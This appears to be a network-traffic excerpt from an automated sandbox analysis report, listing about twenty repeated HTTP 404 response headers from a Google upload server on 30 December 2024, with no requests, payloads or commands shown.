                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Sb546Q_lxpw09JndWOIpI7YPaebkuOmjt2xOFAE4emIYbtdeAsvMCcGM7vmeUaoHlSIb8N6EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-T6xL55gO6AiPAlGPcVIzqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zOrhhOsNUov_iHNNEHJt7p2zGy7B_JWXhi6-JnIaAigabRNuJt1FKBfEL3X5B8OoMmipF6usContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6D1RH_hFPnzqPqWHy6OpCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4fIGlmjMaM427X43BpK4e5WI7l1CM5vf7lvrS62ZOHJVpijsVYlerLp3RqgBG2ZGig5yGl91gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BMGVN8T83X3hpX_Do60QSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7y6gxUqoEREXnAs-MHz86lk5lrfdJhOT7o6UJot0txqA0Vb9sDXvC4lmgDD5Ad22jlZ_XbnaYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xlXTll7geON5jlM4dXVvWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74Hw-NiwCDNjD_ryyRGfepEapoKWpQVk68wigfNnyS4CFJ9JlbVZ0xZb6SpAzZVdw6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-u8ga4YlJPPVda0ZFNsIbfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7cRk_cCVoKygslKK9DbhSGTFhCcGXTqX6VTmzDERw9HNcvhur-qF5FYyPOralfmGNBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-8-YdFcrMRVoL7AXiaRUAiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7CRSRkf-rzrzb0jxftGaI4Hd_Hs61heOcJ3Whv5-Jio8-hgYoFMqEqucGAJwzYki7XContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-UlgwiM-jEEIbFbFHR5T9aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6nq9AlGz-AY3mZIjzYUDT2QAKvSI45gCe1OVwUDC9uyxzuUdaAPPBvWPmyAj57NoS4Jiciu7AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:45 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-88T30mRbMw1eZAwv1v5KVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC693bBh9WwDgWj5CpmnbixNsZBM-7jxJIPbBHBcQNMuxYL9iFARHFROxx_5Hkvt8cqr1bTSmDYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CEY6YKjMInzmcTsJYR4nUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Z8J15Q4Oqjj7uW79jIrwVfjMcSil_hCbBU2ir80fDKfaYupNprF6E8nMOphdFhlOCAMJo-NkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CHwmhILCMnHka12l2rEu5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rhnprKieV14p3CQeCdLTYZcdgnDLbhqfK38gWB6Az_reqdhe3Dqle8iKyvBRmqKxeI7_bNsoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IsGBp8Aw3e_SOjlyvNJIWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC47cu_0DXnKSXa9kUN5rp788kvL_yt3nOrZfsTo6sEB1GAavN0ZD6EoMoQOQcLspvjCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XclLqaOJJ6JamlCnFl7ZaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4jCPf2qSQc9iBkmE4_T_DtlhPuaa-_uPhknjvDJXosS-OXtk4xTzlCF9wGyzLD-bPzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-faA8_YB7g44j8SmxaL8SHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ucJI53KnbExA7HkVDZRgs9AgWlNx57rVv4_cf-PmfLexTiKoJ-hqI19nWJyceiVmFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-hi9gT3dzrjK3lVDmvdpZ7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53oEW-7817LbsMGlKG02dpos0oKuzsVzXmdv4vsO89yJ9B1lLMtFS4OXLTIbBvBWcNAmieirgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:50 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hiNWT0VapWBt3JxbG9Mphw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6jqnXGsNtg2Lt7u0mLduZvG01Gsi_BRTExD2up2fCV32Z1ryZbstSuHv7L3tajUGHMFnA6oZcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:52 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-F1rc_gyEuINHE038dn4z-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4CklQpK4hdgDXZklGf9nE6v7EStcp1Tgis6BtRgFIiC-ZPcdO7rNP5wvqzmTIZ2N0DA-oeaLEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hByvYg_tv1Kx93nsmLFjwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Z6fg-Z4zeF3uGJYHDyyUHCMl06IdMLhhYhL0lPymmOH7guRaW9CUidr2JUw-bOXFPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:53 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d6IekRrFlAVyT7ECOGUVFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6BtfijBR1AP_ZaThRzBOqHbvQnJyvK4IxrIzKTZZ78fAdfuaTtsa0nLJWihMJkZl70k1b8y4IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:53 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-InsDuEDzxx_UcDImlfTy8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aCfem1dZiwXFyFeUIvfHSg2IKTtC1B3PBvzf4spzIEJSutU_uxD1gzNaxq0egb40yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:54 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-AdHbyK22t-sTNBeYtf6f3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
